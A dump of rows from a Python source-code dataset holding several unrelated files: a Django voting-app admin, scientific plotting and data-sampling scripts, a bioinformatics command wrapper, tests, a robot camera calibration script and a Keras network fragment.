Dataset schema (29 columns; name: type, observed range):

blob_id: string (length 40)
directory_id: string (length 40)
path: string (length 2–616)
content_id: string (length 40)
detected_licenses: list (length 0–69)
license_type: string (2 classes)
repo_name: string (length 5–118)
snapshot_id: string (length 40)
revision_id: string (length 40)
branch_name: string (length 4–63)
visit_date: timestamp[us]
revision_date: timestamp[us]
committer_date: timestamp[us]
github_id: int64 (2.91k–686M, nullable)
star_events_count: int64 (0–209k)
fork_events_count: int64 (0–110k)
gha_license_id: string (23 classes)
gha_event_created_at: timestamp[us]
gha_created_at: timestamp[us]
gha_language: string (213 classes)
src_encoding: string (30 classes)
language: string (1 class: Python)
is_vendor: bool (2 classes)
is_generated: bool (2 classes)
length_bytes: int64 (2–10.3M)
extension: string (246 classes)
content: string (length 2–10.3M)
authors: list (length 1)
author_id: string (length 0–212)
bb15df5cbfefe03a569174c2cf19f2d2bf85747f
|
6aea24c1d59efd6edd555e9f635d066b96314b43
|
/VotingUsers/admin.py
|
6b2d1e686dcf53fd6e3a6c4065051f9ee80f31e4
|
[] |
no_license
|
HShehu/Django-Voting-App
|
848f167a59dd81d32d6db34a9f8a8cb58d37fac6
|
679e741d4bec54c7d2019ab111059e45fc674964
|
refs/heads/master
| 2023-04-28T09:43:44.707129
| 2020-01-12T12:04:00
| 2020-01-12T12:04:00
| 233,343,146
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,913
|
py
|
from django import forms
from django.contrib import admin
from django.contrib.auth.models import Group
from django.contrib.auth.admin import UserAdmin as BaseUserAdmin
from django.contrib.auth.forms import ReadOnlyPasswordHashField
from .models import VotingUser
# Register your models here.
class LoginForm(forms.Form):
student_number = forms.CharField(widget=forms.TextInput)
password = forms.CharField(widget=forms.PasswordInput())
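    # Note: a plain forms.Form ignores this inner Meta class; Meta only has an effect on ModelForm subclasses.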
class Meta:
model = VotingUser
fields = ('student_number','password',)
class UserCreationForm(forms.ModelForm):
password1 = forms.CharField(label='Password', widget=forms.PasswordInput)
password2 = forms.CharField(
label='Password confirmation', widget=forms.PasswordInput)
class Meta:
model = VotingUser
fields = ('student_number', 'full_name',
'login_code', 'password1', 'password2')
def clean_password2(self):
# Check that the two password entries match
password1 = self.cleaned_data.get("password1")
password2 = self.cleaned_data.get("password2")
if password1 and password2 and password1 != password2:
raise forms.ValidationError("Passwords don't match")
return password2
def save(self, commit=True):
# Save the provided password in hashed format
user = super().save(commit=False)
user.set_password(self.cleaned_data["password1"])
if commit:
user.save()
return user
class UserChangeForm(forms.ModelForm):
"""A form for updating users. Includes all the fields on
the user, but replaces the password field with admin's
password hash display field.
"""
password = ReadOnlyPasswordHashField()
class Meta:
model = VotingUser
fields = ('student_number', 'password', 'full_name', 'login_code', 'is_staff',
'is_active', 'is_admin')
def clean_password(self):
# Regardless of what the user provides, return the initial value.
# This is done here, rather than on the field, because the
# field does not have access to the initial value
return self.initial["password"]
class VotingUserAdmin(BaseUserAdmin):
form = UserChangeForm
add_form = UserCreationForm
list_display = ('student_number', 'full_name', 'date_joined',
'last_login', 'is_admin', 'is_staff')
    search_fields = ('student_number', 'full_name', 'is_admin', 'is_staff')
readonly_fields = ('date_joined', 'last_login')
filter_horizontal = ()
list_filter = ()
fieldsets = ()
add_fieldsets = (
(None, {
'classes': ('wide',),
'fields': ('full_name', 'student_number', 'password1', 'password2', 'login_code'),
}),
)
ordering = ('full_name',)
admin.site.register(VotingUser, VotingUserAdmin)
admin.site.unregister(Group)
|
[
"harandemshehu@gmail.com"
] |
harandemshehu@gmail.com
|
ba871c0ac28cf7b9e54bc7b51cf6189e65dda6c3
|
54b70a12932f93216d499666998d80a13fc1fb28
|
/PyDSTool/Toolbox/prep_boxplot.py
|
daf5a9a17df47186b8686547a110a8d8e829e734
|
[
"BSD-2-Clause"
] |
permissive
|
waltherg/pydstool-1
|
8e3954b0b5f8728290fd772536987b16325a1b52
|
e56086b230627e7cbe2099f3cd0734cb6918dc7f
|
refs/heads/master
| 2021-01-15T20:48:15.566752
| 2013-09-27T08:47:02
| 2013-09-27T08:47:02
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,211
|
py
|
from PyDSTool import remain, loadObjects, array, save_fig, arange, args
from matplotlib.font_manager import FontProperties
from PyDSTool.matplotlib_import import *
from scipy import mean
##symbol_map = {'isomap': {
## 'K': {10: 'k<', 50: 'k>', 100: 'k^', 500: 'kv'},
## 'eps': {20: 'w<', 50: 'w>', 100: 'w^'}
## },
## 'pca': {
## 'knee': {1: 'ws', 2: 'ks'},
## 'var': {80: 'wo', 90: 'ko'}
## }
## }
symbol_map = {'isomap': {
'K': {10: ('ws', 'E'), 50: ('ws', 'F'),
100: ('ws', 'G'), 500: ('ws', 'H')},
'eps': {20: ('ws', 'I'), 50: ('ws', 'J'),
100: ('ws', 'K')}
},
'pca': {
'knee': {1: ('wo', 'A'), 2: ('wo', 'B')},
'var': {80: ('wo', 'C'), 90: ('wo', 'D')}
}
}
# For use with PD-E analysis
def prep_boxplots(data, xlabel_str, figname='', fignum=1, do_legend=1,
means=1, xlegoff=0, ylegstep=1, ylegoff=0, spacing=None):
spacing_actual = {
'width': 0.1,
'wgapfac': 0.75,
'markersize': 12,
'off_fac': 0.7,
'x_step': 0.9, # 9 * width
'x_off': 0,
'box_to_marker': 1.1,
'notch_size': 0.2}
if spacing is not None:
spacing_actual.update(spacing)
width = spacing_actual['width']
wgapfac = spacing_actual['wgapfac']
markersize = spacing_actual['markersize']
off_fac = spacing_actual['off_fac']
x_step = spacing_actual['x_step']
x_off = spacing_actual['x_off']
box_to_marker = spacing_actual['box_to_marker']
notch_size = spacing_actual['notch_size']
n = len(data)
x_min = -width*3.8 #3.75
x_max = (n-1)*x_step+width*4.5 #3.75
if n > 1:
halfticks = arange(1,n)*x_step-x_step/2
figure(fignum)
# work out ordering of data from 'pos' key
order = {}
# `pos` position runs from 1 to n, `ns` runs from 0 to n-1
ns = []
for k, v in data.iteritems():
order[v['pos']] = k
ns.append(v['pos']-1)
ns.sort()
assert ns == range(n)
maxD = 0
max_dimval_markers = 0
labels = []
for pos in range(n):
name = order[pos+1]
pde_name = 'PD_E-'+name
if 'known_dim' in data[name]:
if n == 1:
kdx1 = x_min
kdx2 = x_max
else:
if pos == 0:
kdx1 = x_min
kdx2 = halfticks[0]
elif pos == n-1:
kdx1 = halfticks[n-2]
kdx2 = x_max
else:
kdx1 = halfticks[pos-1]
kdx2 = halfticks[pos]
plot([[kdx1], [kdx2]],
[data[name]['known_dim'],data[name]['known_dim']],
'k', linewidth=1, zorder=0)
slope_data = loadObjects(pde_name)[2]
ds_mins = array(slope_data[:,0])#,shape=(len(slope_data),1))
ds_mins.shape=(len(slope_data),1)
ds_maxs = array(slope_data[:,1])#,shape=(len(slope_data),1))
ds_maxs.shape=(len(slope_data),1)
max_ds = max([max(ds_mins[:,0]),max(ds_maxs[:,0])])
if max_ds > maxD:
maxD = max_ds
# limits args are ineffective here
boxplot(ds_mins,positions=[pos*x_step-width*wgapfac+x_off],whis=100,
means=means,monochrome=True,notch=2,notchsize=notch_size,
limits=(),widths=width,fill=1)
boxplot(ds_maxs,positions=[pos*x_step+width*wgapfac+x_off],whis=100,
means=means,monochrome=True,notch=2,notchsize=notch_size,
limits=(),widths=width,fill=1)
if pos == 0:
fa = figure(fignum).axes[0]
fa.hold(True)
if means:
ds_all_mean = (mean(ds_mins[:,0])+mean(ds_maxs[:,0]))/2
plot([pos*x_step+x_off], [ds_all_mean], 'k^',
markersize=markersize-2)
pca_x = pos*x_step-width*(wgapfac+box_to_marker)+x_off
isomap_x = pos*x_step+width*(wgapfac+box_to_marker)+x_off
pca_ds = {}
isomap_ds = {}
try:
pca_data = data[name]['pca']
except KeyError:
pca_data = []
pca_ds, max_dimval_pca, pca_used = plot_markers(pca_data,
pca_x, 'PCA',
symbol_map['pca'], -1,
width, off_fac, markersize)
if max_dimval_pca > maxD:
maxD = max_dimval_pca
if max_dimval_pca > max_dimval_markers:
max_dimval_markers = max_dimval_pca
try:
isomap_data = data[name]['isomap']
except KeyError:
isomap_data = []
isomap_ds, max_dimval_iso, isomap_used = plot_markers(isomap_data,
isomap_x, 'Isomap',
symbol_map['isomap'], 1,
width, off_fac, markersize)
if max_dimval_iso > maxD:
maxD = max_dimval_iso
if max_dimval_iso > max_dimval_markers:
max_dimval_markers = max_dimval_iso
labels.append(data[name]['label'])
## legend
if do_legend:
font = FontProperties()
font.set_family('sans-serif')
font.set_size(11)
x_legend = x_min + 3*width/4 + xlegoff
y_legend = maxD+ylegoff
# pca legend
for k, s in pca_used:
plot_markers([(k,s,y_legend)], x_legend, 'Legend', symbol_map['pca'],
1, width, off_fac, markersize)
if k == 'var':
legstr = "%s=%d%%"%(k,s)
else:
legstr = "%s=%d"%(k,s)
text(x_legend+3*width/4, y_legend-width*2., legstr,
fontproperties=font)
y_legend -= ylegstep
# isomap legend
isomap_leg_data = []
for k, s in isomap_used:
if y_legend-width*2. <= max_dimval_markers + 2:
y_legend = maxD+ylegoff
x_legend += x_step #-width*.75
plot_markers([(k,s,y_legend)], x_legend, 'Legend', symbol_map['isomap'],
1, width, off_fac, markersize)
## if k == 'eps':
## kstr = '\\epsilon'
## else:
## kstr = k
text(x_legend+3*width/4, y_legend-width*2., "%s=%d"%(k,s),
fontproperties=font)
y_legend -= ylegstep
## tidy up axes, etc.
fa.set_xticks(arange(n)*x_step)
if n>1:
for h in range(n-1):
plot([halfticks[h], halfticks[h]], [0,maxD+1+ylegoff], 'k:')
fa.set_xticklabels(labels)
fa.set_position([0.07, 0.11, 0.9, 0.85])
fa.set_xlim(x_min,x_max)
fa.set_ylim(0,maxD+1+ylegoff)
if xlabel_str != '':
xlabel(r'$\rm{'+xlabel_str+r'}$',args(fontsize=20,fontname='Times'))
ylabel(r'$\rm{Dimension}$',args(fontsize=20,fontname='Times'))
draw()
if figname != '':
save_fig(fignum, figname)
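# Plot one marker per (kind, subkind, dimension-estimate) tuple at x_base, nudging
# repeated estimates of the same dimension value sideways so they stay visible.
# Returns (counts per dimension value, max dimension seen, (kind, subkind) pairs used).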
def plot_markers(data, x_base, name, map, xoff_sgn, width, off_fac,
markersize):
maxD = 0
ds = {}
used = []
font = FontProperties()
font.set_family('sans-serif')
font.set_size(10)
for (kind, subkind, dimval) in data:
try:
symb, lab = map[kind][subkind]
except KeyError:
raise KeyError("Invalid key for %s symbols"%name)
used.append((kind, subkind))
try:
ds[dimval] += 1
x_off = xoff_sgn*width*off_fac*(ds[dimval]-1)
except KeyError:
ds[dimval] = 1
x_off = 0
plot([x_base+x_off], [dimval], symb, markersize=markersize)
# hack tweaks
## if lab=='C':
## x_off -= width/15
if lab=='A':
x_off += width/30
text(x_base+x_off-width*.15, dimval-width*2., lab,
fontproperties=font)
if dimval > maxD:
maxD = dimval
return ds, maxD, used
|
[
"rob.clewley@gmail.com"
] |
rob.clewley@gmail.com
|
8df3680c60c5ed0be3507f20ab872a0b2e4420b2
|
a340eb341a38be522a5c4fc359d9345cfb378343
|
/sample/1get_patent_random.py
|
5e0400f1868f45b8fac0e402599b199b5e39ee0b
|
[] |
no_license
|
Catchy1997/DLPAP
|
76fa5758d313be4ddaeacb98b397653a7c4f528b
|
fda4b7d6fee5398140279ba694663670028180c3
|
refs/heads/master
| 2023-01-18T17:35:07.235209
| 2020-12-01T10:37:20
| 2020-12-01T10:37:20
| 262,620,534
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,482
|
py
|
import pandas as pd
import os
from tqdm import tqdm
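# Recursively collect the paths of all .csv files under filepath.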
def csv_dir(filepath, path_list):
for i in tqdm(os.listdir(filepath), ncols=50):
path = os.path.join(filepath, i)
if os.path.isdir(path):
csv_dir(path, path_list)
if path.endswith(".csv"):
path_list.append(path)
return path_list
def sum_patent(year, filepath):
path_list = []
path_list = csv_dir(filepath, path_list)
print(year + " - csv文件数量:" + str(len(path_list)))
patent_file_sum = pd.DataFrame()
for path in path_list:
patent_file = pd.read_csv(path, encoding='utf-8')
patent_file_sum = patent_file_sum.append(patent_file)
print(year + " - 涉及专利数量:" + str(len(patent_file_sum)))
return patent_file_sum
if __name__ == '__main__':
year = "2012"
location_path = "E:/Pythonworkspace/patent/patent_data/Application/" + year + "/"
patent_file_sum = sum_patent(year, location_path)
sample_num_list = [5000, 10000, 20000]
save_path = "E:/Pythonworkspace/patent/process_data/"
for sample_num in sample_num_list:
print("sample number: " + str(sample_num))
result_1 = patent_file_sum[patent_file_sum['result'] == 1]
result_0 = patent_file_sum[patent_file_sum['result'] == 0]
df1 = result_1.sample(int(sample_num)//2)
df0 = result_0.sample(int(sample_num)//2)
df = pd.concat([df1, df0])
filepath = save_path + "sample" + str(sample_num) + "/sample.xlsx"
df.to_excel(filepath)
|
[
"1003677516@qq.com"
] |
1003677516@qq.com
|
37b4ccc5e603b7528bd414ae5bfabf393f41b25f
|
d386ffb0fdd378b6a2478a59866dc9b92ebaac4c
|
/centrifuge.py
|
488456ea39d9c8467af192f4d81b72a4e672756a
|
[] |
no_license
|
theo-allnutt-bioinformatics/scripts
|
7aea8ddb2aee619f866d3bf8a7fde26cc45d317f
|
620ce7dcee65a979d86cae96f8a928cce9426879
|
refs/heads/master
| 2023-04-02T02:15:52.300023
| 2023-03-23T02:17:49
| 2023-03-23T02:17:49
| 135,370,890
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,144
|
py
|
#!/usr/bin/env python
import sys
import re
import glob
import subprocess as sp
import os
digits = re.compile(r'(\d+)')
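# Natural-sort key: split a filename into alternating text/number fragments so
# that, e.g., "sample2" sorts before "sample10".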
def tokenize(filename):
return tuple(int(token) if match else token
for token, match in
((fragment, digits.search(fragment))
for fragment in digits.split(filename)))
folder = sys.argv[1]
#folder = os.path.expanduser(folder)
filelist=glob.glob(folder)
filelist.sort(key=tokenize)
outfolder=sys.argv[2]
outsuffix=sys.argv[3]
db=sys.argv[4]
threads=sys.argv[5]
stype=sys.argv[6] #f for fasta q for fastq.. unaligned saved reads are fastq
print filelist
for i in filelist:
print i
outputfile=outfolder+"/"+i.split("/")[-1].split(".")[0]+outsuffix+".cent"
reportfile=outfolder+"/"+i.split("/")[-1].split(".")[0]+outsuffix+".report"
outnomatch=outfolder+"/"+i.split("/")[-1].split(".")[0]+outsuffix+".nohit.fasta"
p1= sp.Popen("/stornext/HPCScratch/home/allnutt.t/bin/centrifuge/centrifuge -x %s -U %s -S %s --report-file %s --un %s --min-hitlen 50 -k 1 -p %s -%s --verbose" %(db,i,outputfile,reportfile,outnomatch,threads,stype), shell=True).wait()
|
[
"noreply@github.com"
] |
theo-allnutt-bioinformatics.noreply@github.com
|
589dc15d83d54624028bcba4ef50d993bef4ab3f
|
ec1591c8185a9debc63a8a4975b2e06a4f5de8a7
|
/tests/test_cli.py
|
9b0e0a63fba6cd3cbc10c3924f88b27fd9bc4c97
|
[
"MIT"
] |
permissive
|
xkumiyu/case-style-changer
|
e605b0dd3c0c23ac3bdc6eafbb1a6b81d680f169
|
26405cf63a4a21572ab634c2a25aab33dc5b616d
|
refs/heads/master
| 2021-06-26T21:06:10.049347
| 2021-01-02T07:22:24
| 2021-01-02T07:22:24
| 229,064,331
| 2
| 0
|
MIT
| 2021-06-01T20:39:30
| 2019-12-19T13:51:15
|
Python
|
UTF-8
|
Python
| false
| false
| 927
|
py
|
import pytest
from case_style_changer.cli import change_case_style
from case_style_changer.cli import parse_args
@pytest.mark.parametrize(
"args, expected",
[
(["camel_case"], {"case_name": "camel_case", "text": None}),
(
["camel_case", "--text", "case style changer"],
{"case_name": "camel_case", "text": "case style changer"},
),
],
)
def test_parser(args, expected):
args = parse_args(args)
assert args.case_name == expected["case_name"]
assert args.text == expected["text"]
@pytest.mark.parametrize(
"text, case_name, expected",
[
("case", "camel", "case"),
("case style changer", "camel_case", "caseStyleChanger"),
("case style\nchanger", "lcc", "caseStyle\nchanger"),
],
)
def test_change_case_style(text, case_name, expected):
result = change_case_style(text, case_name)
assert result == expected
|
[
"xkumiyu@gmail.com"
] |
xkumiyu@gmail.com
|
f1ae19fa704e329df40fcda0e9440f272b59a023
|
1cf679c1fbf24d7eef91d07d3b917ed71f1a3c67
|
/drf13/drf13/asgi.py
|
be7705b0ab54acf66648789d68b75631e7d54cce
|
[] |
no_license
|
manvii3110/Django-Rest-Framework
|
76ef0a0b0886184aec061dc0669440969eca4810
|
69fd8701d1be45bfdec4d585b8579dcfcfe4e3c3
|
refs/heads/master
| 2023-07-17T01:01:47.976108
| 2021-08-28T09:20:32
| 2021-08-28T09:20:32
| 397,284,627
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 387
|
py
|
"""
ASGI config for drf13 project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'drf13.settings')
application = get_asgi_application()
|
[
"msinghal3102@gmail.com"
] |
msinghal3102@gmail.com
|
11512be1019c8d77e6c0541c852f00fd86caa371
|
8739a104f09f17890680fec70f242c2c4f41da86
|
/scripts/Calibration/RealsenseF200/make_handCamCalibData_ir.py
|
96d0c55aa072c355d37e81cd6217ee4e6e114c2f
|
[] |
no_license
|
W567/Plates_stacking
|
dfa71d0cd104e1b80056ef0ce7207ace73e9f211
|
0c5b433b1963726520d00feec153b9164e73e2a5
|
refs/heads/master
| 2021-02-27T05:25:19.915102
| 2020-03-07T06:54:14
| 2020-03-07T06:54:14
| 245,583,651
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 9,540
|
py
|
import sys
import os
import time
import copy
import threading
import numpy as np
import json
import cv2
import xml.etree.ElementTree as xmlEt
from math import pi
# import world path ===================
import WorkspaceDirInfo as shareDir
sys.path.append(shareDir.WorkspaceDir)
import share.tools.geo.geo as geo
# import local path ===================
sys.path.append(os.path.join(".."))
import set_env
baseDir = shareDir.WorkspaceDir + set_env.MyName
sys.path.append(baseDir)
import myPyUtil as myUtil
### define Chessboard information ###
CHESS_SIZE = (13 - 1, 9 - 1)
#CHESS_SIZE = (12 - 1, 7 - 1)
CHESS_SQUARE_SIZE = 25 # [mm]
### path of camera parameter #####################
PATH_CAM_PARAM = shareDir.WorkspaceDir + "share/data/RealSense/RealSense-02/intrinsic_IR.xml"
PATH_IMAGE_DATA = baseDir + "/data/handCamCalib_ir/"
TITLE = "picture"
EXTENSION = ".png"
JSON_DATA_NAME = "handCamCalibData_ir.json"
### Transform HAND to CAMERA as initial value ##################
Th2c_handCam_xyzabc = [
- 0.090, # [m]
0.000, # [m]
0.135, # 0.033, #[m]
0.00 * pi, # rotation around x axis [rad]
0.00 * pi, # rotation around y axis [rad]
- 0.50 * pi # rotation around z axis [rad]
]
Th2c_handCam = geo.FRAME(xyzabc=Th2c_handCam_xyzabc)
### Transform HAND to TOOL TIP for calib motion ###
Th2tool_handCamCalib_xyzabc = [
-0.084, # -0.084,
-0.02, # -0.02,
0.45, # 0.45,
0.00 * pi,
0.99999999 * pi,
0.00 * pi]
# Th2tool_handCamCalib_xyzabc = [
# -0.086,
# 0.00,
# 0.50,
# 0.00 * pi,
# 0.99999999 * pi,
# 0.00 * pi]
# Th2tool_handCamCalib_xyzabc = [
# 0.00,
# 0.00,
# 0.227,
# 0.00 * pi,
# 0.99999999 * pi,
# 0.00 * pi])
Th2tool_handCamCalib = geo.FRAME(xyzabc=Th2tool_handCamCalib_xyzabc)
### motion conf center of watch ################################################
# x = 0.70
# y = 0.06# -0.16
# z = 0.01
x = 0.837
y = -0.293# -0.16
z = 0.01
# x = 0.70
# y = 0.065# -0.16
# z = 0.03
Pos_B = []
Pos_B.append([x, y, z, 0, 0, 0])
Pos_B.append([x, y, z, 0.05 * pi, -0.1 * pi, 0 * pi])
Pos_B.append([x, y, z, -0.00 * pi, -0.1 * pi, 0 * pi])
Pos_B.append([x, y, z, -0.1 * pi, -0.1 * pi, 0 * pi])
Pos_B.append([x, y, z, -0.2 * pi, -0.1 * pi, 0 * pi])
Pos_B.append([x, y, z, 0.05 * pi, -0.0 * pi, 0 * pi])
Pos_B.append([x, y, z, -0.00 * pi, -0.0 * pi, 0 * pi])
Pos_B.append([x, y, z, -0.1 * pi, -0.0 * pi, 0 * pi])
Pos_B.append([x, y, z, -0.2 * pi, -0.0 * pi, 0 * pi])
Pos_B.append([x, y, z, -0.00 * pi, 0.05 * pi, 0 * pi])
Pos_B.append([x, y, z, -0.1 * pi, 0.05 * pi, 0 * pi])
Pos_B.append([x, y, z, -0.2 * pi, 0.05 * pi, 0 * pi])
#####
Pos_B.append([x, y, z, 0.05 * pi, -0.1 * pi, 0.25 * pi])
Pos_B.append([x, y, z, -0.00 * pi, -0.1 * pi, 0.25 * pi])
Pos_B.append([x, y, z, -0.1 * pi, -0.1 * pi, 0.25 * pi])
Pos_B.append([x, y, z, -0.2 * pi, -0.1 * pi, 0.25 * pi])
Pos_B.append([x, y, z, 0.05 * pi, -0.0 * pi, 0.25 * pi])
Pos_B.append([x, y, z, -0.00 * pi, -0.0 * pi, 0.25 * pi])
Pos_B.append([x, y, z, -0.1 * pi, -0.0 * pi, 0.25 * pi])
Pos_B.append([x, y, z, -0.2 * pi, -0.0 * pi, 0.25 * pi])
#Pos_B.append([x, y, z, -0.00 * pi, 0.05 * pi, 0.25 * pi])
Pos_B.append([x, y, z, -0.1 * pi, 0.05 * pi, 0.25 * pi])
Pos_B.append([x, y, z, -0.2 * pi, 0.05 * pi, 0.25 * pi])
#Pos_B.append([x, y, z, 0.15 * pi, 0.05 * pi, -0.4 * pi])
#Pos_B.append([x, y, z, 0.095 * pi, 0.025 * pi, 0.2 * pi])
#Pos_B.append([x, y, z, -0.00 * pi, 0.05 * pi, -0.2 * pi])
Pos_B.append([x, y, z, -0.075 * pi, -0.1 * pi, 0.1 * pi])
Pos_B.append([x, y, z, -0.15 * pi, -0.05 * pi, -0.3 * pi])
#Pos_B.append([x, y, z, 0.15 * pi, -0.1 * pi, -0.4 * pi])
#Pos_B.append([x, y, z, 0.075 * pi, -0.05 * pi, -0.2 * pi])
Pos_B.append([x, y, z, -0.00 * pi, -0.1 * pi, 0.1 * pi])
Pos_B.append([x, y, z, -0.075 * pi, 0.05 * pi, -0.1 * pi])
#Pos_B.append([x, y, z, -0.15 * pi, 0.1 * pi, 0.1 * pi])
#=========================================================================
plist_handCamCalib = []
plist_handCamCalib.append([x, y, z, 0.20 * pi, 0, 0.4 * pi])
plist_handCamCalib.append([x, y, z, 0.1 * pi, 0, -0.35 * pi])
plist_handCamCalib.append([x, y, z, -0.00 * pi, -0.05, 0.2 * pi])
plist_handCamCalib.append([x, y, z, -0.1 * pi, 0, -0.4 * pi])
plist_handCamCalib.append([x, y, z, -0.2 * pi, 0, 0.3 * pi])
plist_handCamCalib.append([x, y, z, 0.15 * pi, 0.05 * pi, -0.4 * pi])
plist_handCamCalib.append([x, y, z, 0.095 * pi, 0.025 * pi, 0.2 * pi])
plist_handCamCalib.append([x, y, z, -0.00 * pi, 0.05 * pi, -0.2 * pi])
plist_handCamCalib.append([x, y, z, -0.075 * pi, -0.1 * pi, 0.1 * pi])
plist_handCamCalib.append([x, y, z, -0.15 * pi, -0.05 * pi, -0.3 * pi])
plist_handCamCalib.append([x, y, z, 0.15 * pi, -0.1 * pi, -0.4 * pi])
plist_handCamCalib.append([x, y, z, 0.075 * pi, -0.05 * pi, -0.2 * pi])
plist_handCamCalib.append([x, y, z, -0.00 * pi, -0.1 * pi, 0.1 * pi])
plist_handCamCalib.append([x, y, z, -0.075 * pi, 0.05 * pi, -0.1 * pi])
plist_handCamCalib.append([x, y, z, -0.15 * pi, 0.1 * pi, 0.1 * pi])
def json_read(filePath):
f = open(filePath, "r")
json_data = json.load(f)
f.close()
return json_data
def json_write(dict, filePath):
f = open(filePath, "w")
json.dump(dict, f, indent=4)
f.close()
def move_calib():
from share.tools.classes.f21pa10Class import fpa10Class
from tools.classes.realsenseClass import realsenseClass
camera = realsenseClass()
arm = fpa10Class("_l")
arm.Th2tool = Th2tool_handCamCalib
arm.otc_setToolOffset([arm.Th2tool.vec[0], arm.Th2tool.vec[1], arm.Th2tool.vec[2]])
arm.mode_joint()
arm.move_joint(arm.j_ready)
arm.mode_rmrc()
time.sleep(1)
plistData = []
for i in range(len(Pos_B)):
# raw_input("press Enter to move next point >>")
arm.move_rmrc(Pos_B[i])
        title = TITLE + str(i) + EXTENSION
# time.sleep(1)
# camera.update_image(camera.IR)
time.sleep(3)
camera.save_irImage(PATH_IMAGE_DATA + title)
plistData.append(arm.t_xyzabc_now)
raw_input("finished. press Enter to back to ready position")
arm.mode_joint()
arm.move_joint(arm.j_ready)
data = {"plistData": plistData}
json_write(data, PATH_IMAGE_DATA + "plistData.json")
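# For each image: detect the chessboard, refine the corners, and solve PnP against
# the loaded intrinsics to get the camera-to-board transform (t_vec converted mm -> m).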
def calc_extrinsic(tuple_chessSize, chessSquareSize, list_img, camParam, distortion):
# cvWindow = cv2.namedWindow( "cv_window" )
# create object points
objPoints = []
for i in range(0, tuple_chessSize[1]):
for j in range(0, tuple_chessSize[0]):
objPoints.append((i * chessSquareSize, j * chessSquareSize, 0))
objPoints = np.array(objPoints)
list_Tf = []
list_accept = []
counter = 0
    # process each image
for img in list_img:
print "img : %d" % counter
# cvt img BGR to GRAY
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
        # find chessboard corners
found, corners = cv2.findChessboardCorners(gray, tuple_chessSize)
if found:
# find corner sub pix
cv2.cornerSubPix(
image=gray,
corners=corners,
winSize=(5, 5),
zeroZone=(-1, -1),
criteria=(cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT, 30, 0.01))
# calc extrinsic
print ' distortion'
objPoints = objPoints.astype(np.float64)
found, r_vec, t_vec = cv2.solvePnP(
objectPoints=objPoints,
imagePoints=corners,
cameraMatrix=camParam,
distCoeffs=distortion)
r_mtx, scratch = cv2.Rodrigues(r_vec)
Tf = np.matrix([
[r_mtx[0, 0], r_mtx[0, 1], r_mtx[0, 2], t_vec[0, 0] * 0.001],
[r_mtx[1, 0], r_mtx[1, 1], r_mtx[1, 2], t_vec[1, 0] * 0.001],
[r_mtx[2, 0], r_mtx[2, 1], r_mtx[2, 2], t_vec[2, 0] * 0.001],
[0., 0., 0., 1.], # t_vec is converted [mm]->[m]
])
list_Tf.append(Tf.tolist())
list_accept.append(True)
print "Transform"
print Tf
else:
list_Tf.append(None)
list_accept.append(False)
print "FAILED to fined corner"
print ""
cv2.drawChessboardCorners(img, tuple_chessSize, corners, found)
# cv2.imshow( "cv_window", img )
# cv2.waitKey()
# raw_input()#----------------------------------------------------------
counter += 1
# cv2.destroyWindow("cv_window")
return list_Tf, list_accept
def make_jsonData():
# make plist_handCamCalibData
plistData = json_read(PATH_IMAGE_DATA + "plistData.json")
plist_handCamCalibData = plistData["plistData"]
print plist_handCamCalibData
# make list image
list_img = []
list_inputFileName = []
for i in range(len(plist_handCamCalibData)):
title = PATH_IMAGE_DATA + TITLE + str(i) + EXTENSION
list_inputFileName.append(title)
list_img.append(cv2.imread(title))
# ## load Intrinsic
handCam_intrinsic = xmlEt.parse(PATH_CAM_PARAM).getroot()
camParam = myUtil.cvXml2cvNdarray(handCam_intrinsic.find("camera_matrix"))
distortion = myUtil.cvXml2cvNdarray(handCam_intrinsic.find("distortion_coefficients"))
print 'intrinsic'
print handCam_intrinsic
print ' camParam'
print camParam
print ' distortion'
print distortion
# ## calc extrinsics
list_Tf, isAccepted = calc_extrinsic(
CHESS_SIZE,
CHESS_SQUARE_SIZE,
list_img,
camParam,
distortion)
print "%d images are accepted." % np.sum(isAccepted)
print "list_Tf : ", list_Tf
plist_handCamCalib = []
listTf_Tc2cb = []
for i, ret in enumerate(isAccepted):
if (ret == True):
plist_handCamCalib.append(plist_handCamCalibData[i])
listTf_Tc2cb.append(list_Tf[i])
jdata = {"plist_handCamCalib": plist_handCamCalib, \
"listTf_Tc2cb": listTf_Tc2cb, \
"Th2tool_handCamCalib_xyzabc": Th2tool_handCamCalib_xyzabc, \
"Th2c_handCam_xyzabc": Th2c_handCam_xyzabc
}
json_write(jdata, JSON_DATA_NAME)
if __name__ == "__main__":
# move_calib()
make_jsonData()
|
[
"wlqwa567@hotmail.com"
] |
wlqwa567@hotmail.com
|
5ea5170baa6fdec14d8316f4133420a9339ddcc1
|
12e1fcbeb0bb0c3866e9aa863016ebf5b8cf6fa9
|
/keras/network.py
|
908281f9a7e71e3d9586f0d15d278bc7f28cf585
|
[] |
no_license
|
Grid-Gudx/sound_classification
|
0eee6c523e5c6732ce4456a297757ef20015753c
|
c79a83b5882c1b386254a33b2ac9ac44d0546f7b
|
refs/heads/main
| 2023-08-18T14:51:33.181996
| 2021-09-15T07:54:53
| 2021-09-15T07:54:53
| 403,004,685
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,423
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Sat Sep 4 16:30:42 2021
@author: gdx
"""
from tensorflow.keras.layers import *
import tensorflow.keras.backend as K
from tensorflow.keras import Model
from attention_module import cbam_block
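# Basic CNN stage: two stacked convolutions (the second with a separate ReLU),
# followed by 2x2 max pooling.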
def cnn_block(x, filters, kernel_size):
x = Conv2D(filters, kernel_size, padding='same', activation='relu')(x)
x = Conv2D(filters, kernel_size, padding='same')(x)
x = Activation('relu')(x)
    # x = BatchNormalization(axis=-1,trainable=False)(x)  # normalize each channel
x = MaxPooling2D((2,2))(x)
return x
def res_block(x, filters, kernel_size):
skip = Conv1D(filters, 1, padding='same')(x)
